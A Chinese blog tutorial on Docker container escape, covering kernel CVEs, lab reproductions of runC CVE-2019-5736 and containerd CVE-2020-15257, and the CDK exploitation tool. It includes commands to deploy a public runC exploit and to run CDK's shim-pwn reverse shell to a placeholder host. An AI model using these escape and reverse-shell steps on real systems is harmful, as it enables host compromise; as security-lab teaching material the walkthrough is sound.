云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸

今天是 几 号2023-10-15 13:52

文章目录

云原生-Docker安全-容器逃逸&内核漏洞

细节部分在权限提升章节会详解,常用:

CVE-2016-5195 CVE-2019-16884 CVE-2021-3493

CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222

云原生-Docker安全-容器逃逸&版本漏洞

-CVE-2019-5736 runC容器逃逸

Docker version <= 18.09.2

RunC version <= 1.0-rc6

1、安装docker对应版本

bash 复制代码 
apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

2、启动环境测试:

bash 复制代码 
docker run -itd --cap-add=SYS_ADMIN ubuntu:latest

3、编译修改后EXP后等待管理进入执行
https://github.com/Frichetten/CVE-2019-5736-PoC

bash 复制代码 
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
bash 复制代码 
docker cp main 7f4793f3ac0cd13:/
docker exec -it 7f4793f3ac0cd13 /bin/bash

还有一个条件就是执行main文件后需要管理员进入该容器进行触发
4、实验获取到docker搭建的Web权限后进行逃逸

bash 复制代码 
docker run -it -p 8888:8080 vulhub/struts2:s2-053

-CVE-2020-15257 containerd逃逸

containerd < 1.4.3

containerd < 1.3.9

1、安装docker对应版本

bash 复制代码 
apt-get update
apt-get install ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

2、启动环境测试:

bash 复制代码 
docker pull ubuntu:18.04
docker run -itd --net=host ubuntu:18.04 /bin/bash
docker exec -it 5be3ed60f152 /bin/bash

3、上传CDK自动提权反弹

bash 复制代码 
docker cp cdk_linux_amd64 8e7c27d7b98ca32927:/tmp
chmod 777 cdk_linux_amd64
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

4、实验获取到docker搭建的Web权限后进行逃逸

bash 复制代码 
docker run -it -p 8888:8080 vulhub/struts2:s2-053

云原生-Docker安全-容器逃逸&CDK自动化

检测利用:https://github.com/cdk-team/CDK
信息收集-漏洞探测

bash 复制代码 
./cdk_linux_amd64 evaluate

指定漏洞逃逸

bash 复制代码 
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

常规检测:https://github.com/teamssix/container-escape-check

实现:信息收集,指定逃逸,自动逃逸,修复功能等

相关推荐
程序员跑路8 分钟前
WSL运行redis的踩坑操作记录
docker
小猿姐15 分钟前
当KubeBlocks遇上国产数据库之Kingbase:让信创数据库“飞得更高”
运维·数据库·云原生
李彦亮老师(本人)41 分钟前
Rocky Linux 9.x 安全加固实战指南:从系统初始化到生产级防护
linux·运维·安全·rocky
ai产品老杨1 小时前
异构计算时代的安防底座:基于 Docker 的 X86/ARM 双架构 AI 视频管理平台深度解析
arm开发·docker·架构
hyunbar1 小时前
Docker命令及使用指南
运维·docker·容器
red1giant_star1 小时前
浅析文件类漏洞原理与分类——含payload合集与检测与防护思路
python·安全
溜达的大象2 小时前
本地部署专属听书工具:用 easyVoice 打造无限制的有声书体验
docker
百度智能云技术站2 小时前
ClawHub 漏洞警示:官方商店失守,百度智能云守护小龙虾 Skill 供应链安全
网络·安全·web安全
用户962377954483 小时前
代码审计 | CC1 TransformedMap 链 ——前言 反向调试 构造Payload
安全
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06OpenClaw 使用和管理 MCP 完全指南07班级宠物园部署指南08Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程09“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)10Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services